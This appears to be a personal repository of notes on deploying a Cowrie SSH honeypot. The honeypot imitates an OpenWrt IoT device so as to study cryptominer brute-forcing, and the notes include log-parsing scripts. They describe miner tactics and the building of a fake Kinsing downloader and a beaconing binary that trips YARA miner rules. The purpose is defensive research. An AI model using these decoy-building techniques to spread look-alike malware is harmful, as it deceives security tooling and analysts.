~alienagain/honeypot_notes

notes from my honeypot project

58e5f19 added useful one liners I used a lot

30 days ago

94ea35f whatever

3 months ago

#customized honeypot with cowrie

#1. Creating the basic honeypot

Following this manual I configured a cowrie environment in a VPS:

1.1 Changing the Port 22 to port between 49152 and 65535.

sudo nvim /etc/ssh/sshd_config

1.2 Restart service

sudo systemctl restart ssh
sudo systemctl status ssh

1.3 Install software

sudo apt install -y python-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind git

1.4 Create passwordless user cowrie

sudo adduser --disabled-password cowrie

1.5 Installing authbind, running the command and changing ownership

sudo apt install authbind
sudo touch /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22

1.6 Changing permissions

sudo chmod 770 /etc/authbind/byport/22

1.7 Login as cowrie and going "home"

sudo su cowrie
cd ~ 

1.8 Clonning the cowrie repo and entering it

git clone https://github.com/micheloosterhof/cowrie
cd cowrie

1.9 Create new configuration

cp etc/cowrie.cfg.dist etc/cowrie.cfg

1.10 Edit the file and replacing 2222 with 22 in listen_endpoints

nvim etc/cowrie.cfg

in the file:

listen_endpoints = tcp:2222:interface=0.0.0.0

to

listen_endpoints = tcp:22:interface=0.0.0.0

1.11 create virtual environment and enable it

virtualenv cowrie-env
source cowrie-env/bin/activate

1.12 Updating pip

pip install pip3

1.13 Install requirements

pip3 install -r requirements.txt

1.14 Starting cowrie

bin/cowrie start

1.15 Checking the honeypot

netstat -tan

#2. Customizing the whole thing

2.1 Copying a docker image

In my case I wanted to imitate an IoT Linux device to investigate ssh bruteforce related to cryptomining. So I'm copying a docker system based on openwrt. First I logged off cowrie and in the default sudoer, I performed:

$ sudo docker create --name dummy openwrtorg/rootfs:x86-64
$ for i in proc usr sbin sys lib etc bin; do  sudo docker cp dummy:$i /tmp/picklefs; done

Now I have a copy of the whole openwrt filesystem. I want to create this filesystem in cowrie so:

$ ./home/cowrie/cowrie/bin/createfs -l /tmp/picklefs -d 6 -o /home/cowrie/cowrie/share/cowrie/honeyfs.pickle

The default pickle system is fs.pickle, I did a backup of it and changed the name of the new one:

$ cd /home/cowrie/cowrie/share/cowrie/
$ mv honeyfs.pickle fs.pickle

I also needed to copy in /cowrie/cowrie/etc/ the filesystem, so I used the /tmp/ copy for that.

$ cd /home/cowrie/cowrie/honeyfs
$ rm rf *
$ cp /tmp/picklefs .

The filesystem is copied but I wanted to add some stuff. In the case of cryptominers, most of them attempt a few things:

  • Deleting /etc/ld.so.preload
  • Attempting ssh bruteforce using known_host
  • Deleting competition
  • Using wget and curl to donwload further scripts

So I wanted to put some stuff around to make it "easier" for a cryptominer to be comfortable.

2.2 LD PRELOAD

First creating an empty ld.so.preload file. I used a nice tool of cowrie to interact with the fake filesystem. In the cowrie repo home directory:

$ sudo su cowrie
$ source cowrie-env/bin/activate
(cowrie-env) cowrie@<myvps>:~/cowrie$ ./bin/fsctl share/cowrie/fs.pickle

A shell should open, and then I went like:

Kippo/Cowrie file system interactive editor
Donovan Hubbard, Douglas Hubbard, March 2013
Type 'help' for help

fs.pickle:/$ cd /etc/ 
fs.pickle:/etc$ touch ld.so.preload

2.3 Generating ssh content On cowrie user without the source activated, in /home/cowrie/cowrie/honeyfs:

$ mkdir .ssh
$ mkdir .ssh/config
$ cd .ssh/config
$ ssh-keygen

in the dir and file choice, I choosed the current folder. Later I tried to ssh a beacon address using the same key and saved the known_hosts file in the same folder, too. I went to the shell and added the same files.

2.4 Deleting competition and configuring wget and curl

In /cowrie/share/cowrie/txtcmds/bin created the files curl and wget with fake error messages:

$ touch curl wget
$ nvim curl
...
$ nvim wget
...

Since I was already doing this I added ufw too. In enable file I added fake services with names commonly seen in other cryptominers, so it's seen if any enumeration is attempted.

#3. Testing

When everything was done, I tested it. First, activating the virtualenv and then in the cowrie repo directory:

$ bin/cowrie stop
$ bin/cowrie start

And attempted to connect using another console:

$ ssh -p 22 root@<myip>

I played around a bit in the fake shell and exited. Then I took a look at cowrie/var/log/cowrie. After a day I saw in the logs how some IPs attemped to connect so I created a script to extract those IP's directly:

#!/bin/bash
yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
cat cowrie.json.$yesterday | grep "New connection:" > connections

#file=connections

while read -r line; do

#	echo "DEBUG READIN LINE:"
#	echo $line
	
        ejem=$(echo $line)   

#	echo "DEBUG SAVING CONNECTION"
        step1=${ejem##*connection:}
#	echo "step1 = $step1"
        step2=${step1%%(*}
#	echo "step2 = $step2"
        
        echo $step2 >> collectedIPs_raw
done <connections

awk '!a[$0]++' collectedIPs_raw > collectedIPs

rm collectedIPs_raw
rm connections

I then investigated the IPs in collectedIPs, ignoring my own. I also wanted to investigate commands so I did:

#!/bin/bash

yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
cat cowrie.json.$yesterday | grep "input" > commands

In my local computer I took those files:

#!/bin/bash

if [ "$1" = "IPS" ]; then
	echo "collecting IPs"
	scp -P <my_real_port> <myuser>@<myip>:/home/cowrie/cowrie/var/log/cowrie/collectedIPs .
elif [ "$1" = "commands" ]; then
	echo "collecting commands"
	scp -P <my_real_port> <myuser>@<myip>:/home/cowrie/cowrie/var/log/cowrie/commands .
else
	echo "ERROR"
fi

So all I had to do is:

$ myscript IPS

or:

$ myscript commands

#4.Beacons

As I said, most cryptominers try to delete other competitors. I created a realistic kinsing sample which downloads a "cryptomining binary" from a webserver I'm also serving myself. The rest of the sample looks exactly like a real kinsing miner downloader.

The binary is an elf compiled from bash which has some real but safe miner string lines that trigger YARA alerts of miners in linux, but also attemps to ssh the honeypot shell in a oneliner. I uploaded both on VT, the fake downloader and the fake binary :)

#5.Conclusions

So far, a few IPS attempted to connect, most of them are digital ocean IPs that are related to malware and sshbrute forcers. A couple of them attempted to TLS handshake as an attempt to connect using https protocol.